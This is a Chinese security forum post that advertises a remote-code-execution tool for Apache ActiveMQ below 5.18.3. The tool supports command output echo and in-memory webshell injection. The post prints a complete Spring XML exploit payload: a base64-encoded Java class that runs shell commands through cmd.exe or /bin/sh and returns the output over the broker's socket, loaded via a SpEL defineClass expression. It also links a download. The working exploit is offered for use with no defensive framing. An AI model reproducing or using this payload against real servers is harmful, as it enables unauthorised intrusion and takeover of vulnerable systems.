设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
暗月安全培训论坛»论坛 安全板块 安全软件 ActiveMqRCE漏洞利用工具
返回列表 发新帖
查看: 150|回复: 0

ActiveMqRCE漏洞利用工具

[复制链接]
月师傅

91

主题

0

回帖

371

积分

管理员

积分
371
发表于 2025-5-24 15:06:54 | 显示全部楼层 |阅读模式
ActiveMqRCE漏洞利用工具

用java实现构造openwire协议,利用activeMQ < 5.18.3 RCE 回显利用 内存马注入
11.16号新增有回显的命令执行exp
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <beans xmlns="http://www.springframework.org/schema/beans"
  3.        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:spring="http://camel.apache.org/schema/spring"
  4.        xmlns:context="http://www.springframework.org/schema/context"
  5.        xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd http://camel.apache.org/schema/spring http://camel.apache.org/schema/spring/camel-spring.xsd http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context.xsd">
  6.     <context:property-placeholder ignore-resource-not-found="false" ignore-unresolvable="false"/>

  8.     <bean id="base64Str" class="java.lang.String">
  9.         <constructor-arg>
  10.             <value>yv66vgAAADQAtgoAKgBhCABiCABjCgBkAGUKAA0AZggAZwoADQBoCABpCABqCABrCABsBwBtBwBuCgAMAG8KAAwAcAoAcQByBwBzCgARAGEKAHQAdQoAEQB2CgARAHcKAA0AeAcAeQoAFwB6CgB7AHwIAH0KAH4AfwgARAoAfgCACgCBAIIKAIEAgwcAhAgAhQgASgcAhgoAIwCHCACICgANAIkKAIoAiwoAigCMBwCNBwCOAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA1MQ01EUmVzcG9uc2U7AQAEdGVzdAEAFShMamF2YS9sYW5nL1N0cmluZzspVgEADnByb2Nlc3NCdWlsZGVyAQAaTGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcjsBAAVzdGFydAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAAtpbnB1dFN0cmVhbQEAFUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAFWJ5dGVBcnJheU91dHB1dFN0cmVhbQEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAARyZWFkAQABSQEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAAZhQ2xhc3MBABFMamF2YS9sYW5nL0NsYXNzOwEABnRhcmdldAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAl0cmFuc3BvcnQBADBMb3JnL2FwYWNoZS9hY3RpdmVtcS90cmFuc3BvcnQvdGNwL1RjcFRyYW5zcG9ydDsBAAdhQ2xhc3MxAQALc29ja2V0ZmllbGQBAAZzb2NrZXQBABFMamF2YS9uZXQvU29ja2V0OwEADG91dHB1dFN0cmVhbQEAFkxqYXZhL2lvL091dHB1dFN0cmVhbTsBAANjbWQBABJMamF2YS9sYW5nL1N0cmluZzsBAAZyZXN1bHQBAAdwcm9jZXNzAQADYXJnAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAFExqYXZhL2xhbmcvQ2xhc3M8Kj47AQANU3RhY2tNYXBUYWJsZQcAbgcAjQcAbQcAjwcAkAcAcwcAeQEACkV4Y2VwdGlvbnMHAJEBAApTb3VyY2VGaWxlAQAQQ01EUmVzcG9uc2UuamF2YQwAKwAsAQAAAQAHb3MubmFtZQcAkgwAkwCUDACVAJYBAAd3aW5kb3dzDACXAJgBAAdjbWQuZXhlAQACL2MBAAcvYmluL3NoAQACLWMBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBABBqYXZhL2xhbmcvU3RyaW5nDAArAJkMADYAmgcAjwwAmwCcAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0HAJAMADwAnQwAngCfDACgAKEMACsAogEAE2phdmEvbGFuZy9FeGNlcHRpb24MAKMAlgcApAwApQCmAQAQamF2YS5sYW5nLlRocmVhZAcApwwAqACpDACqAKsHAKwMAK0ArgwArwCwAQAub3JnL2FwYWNoZS9hY3RpdmVtcS90cmFuc3BvcnQvdGNwL1RjcFRyYW5zcG9ydAEALm9yZy5hcGFjaGUuYWN0aXZlbXEudHJhbnNwb3J0LnRjcC5UY3BUcmFuc3BvcnQBAA9qYXZhL25ldC9Tb2NrZXQMALEAsgEAAQoMALMAoQcAtAwAngCiDAC1ACwBAAtDTURSZXNwb25zZQEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUHJvY2VzcwEAE2phdmEvaW8vSW5wdXRTdHJlYW0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAt0b0xvd2VyQ2FzZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAHaW5kZXhPZgEAFShMamF2YS9sYW5nL1N0cmluZzspSQEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQADKClJAQAFd3JpdGUBAAQoSSlWAQALdG9CeXRlQXJyYXkBAAQoKVtCAQAFKFtCKVYBAApnZXRNZXNzYWdlAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAD2phdmEvbGFuZy9DbGFzcwEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAD2dldE91dHB1dFN0cmVhbQEAGCgpTGphdmEvaW8vT3V0cHV0U3RyZWFtOwEACGdldEJ5dGVzAQAUamF2YS9pby9PdXRwdXRTdHJlYW0BAAVjbG9zZQAhACkAKgAAAAAAAgABACsALAABAC0AAAAvAAEAAQAAAAUqtwABsQAAAAIALgAAAAYAAQAAAAcALwAAAAwAAQAAAAUAMAAxAAAAAQAyADMAAgAtAAAC5wAGAA0AAAD7EgJNEgJOEgI6BBIDuAAEtgAFEga2AAebAA0SCE4SCToEpwAKEgpOEgs6BLsADFkGvQANWQMtU1kEGQRTWQUrU7cADjoFGQW2AA86BhkGtgAQOge7ABFZtwASOggDNgkZB7YAE1k2CQKfAA0ZCBUJtgAUp//tuwANWRkItgAVtwAWTacACzoFGQW2ABhNuAAZOgUSGrgAGzoGGQYSHLYAHToHGQcEtgAeGQcZBbYAH8AAIDoIEiG4ABs6CRkJEiK2AB06ChkKBLYAHhkKGQi2AB/AACM6CxkLtgAkOgwZDBIltgAmtgAnGQwstgAmtgAnGQy2ACinAAU6BbEAAgArAIIAhQAXAI0A9QD4ABcABAAuAAAAjgAjAAAACwADAAwABgANAAoADgAaAA8AHQAQACQAEgAnABMAKwAWAEUAFwBMABgAUwAZAFwAGgBfABsAawAcAHUAHgCCACEAhQAfAIcAIACNACQAkgAlAJkAJgCiACcAqAAoALQAKQC7ACoAxAArAMoALADWAC0A3QAuAOcALwDwADAA9QAzAPgAMQD6ADgALwAAAMAAEwBFAD0ANAA1AAUATAA2ADYANwAGAFMALwA4ADkABwBcACYAOgA7AAgAXwAjADwAPQAJAIcABgA+AD8ABQCSAGMAQABBAAUAmQBcAEIAQwAGAKIAUwBEAEUABwC0AEEARgBHAAgAuwA6AEgAQwAJAMQAMQBJAEUACgDWAB8ASgBLAAsA3QAYAEwATQAMAAAA+wAwADEAAAAAAPsATgBPAAEAAwD4AFAATwACAAYA9QBRAE8AAwAKAPEAUgBPAAQAUwAAABYAAgCZAFwAQgBUAAYAuwA6AEgAVAAJAFUAAABUAAj+ACQHAFYHAFYHAFYG/wAzAAoHAFcHAFYHAFYHAFYHAFYHAFgHAFkHAFoHAFsBAAAV/wAPAAUHAFcHAFYHAFYHAFYHAFYAAQcAXAf3AGoHAFwBAF0AAAAEAAEAXgABAF8AAAACAGA=</value>
  11.         </constructor-arg>
  12.     </bean>

  14.     <bean id="cmd" class="java.lang.String">
  15.         <constructor-arg value="ls"></constructor-arg>
  16.     </bean>
  17.     <bean  class="#{T(org.springframework.cglib.core.ReflectUtils).defineClass('CMDResponse',T(org.springframework.util.Base64Utils).decodeFromString(base64Str.toString()),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance().test(cmd.toString())}">
  18.     </bean>
  19. </beans>
复制代码

下载地址 https://github.com/Hutt0n0/ActiveMqRCE

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|暗月安全培训论坛

GMT+8, 2026-1-10 04:39 , Processed in 0.064276 second(s), 20 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表